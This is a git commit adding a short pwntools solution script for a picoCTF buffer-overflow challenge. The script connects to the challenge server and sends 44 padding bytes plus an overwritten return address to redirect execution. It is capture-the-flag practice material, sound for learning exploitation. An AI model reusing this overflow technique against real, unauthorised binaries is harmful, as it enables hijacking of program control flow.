some more playlist stuff
This commit is contained in:
11
mochis_tale/binary_exploitation/buffer_overflow_1/sol.py
Executable file
11
mochis_tale/binary_exploitation/buffer_overflow_1/sol.py
Executable file
@@ -0,0 +1,11 @@
|
||||
#!/home/maxime/.pyvenv/bin/python3
|
||||
from pwn import *
|
||||
|
||||
conn = remote("saturn.picoctf.net", 63154)
|
||||
|
||||
conn.recvline()
|
||||
conn.sendline(b'0'*44 + b'\xf6\x91\x04\x08')
|
||||
conn.interactive()
|
||||
|
||||
conn.close()
|
||||
|
||||
Reference in New Issue
Block a user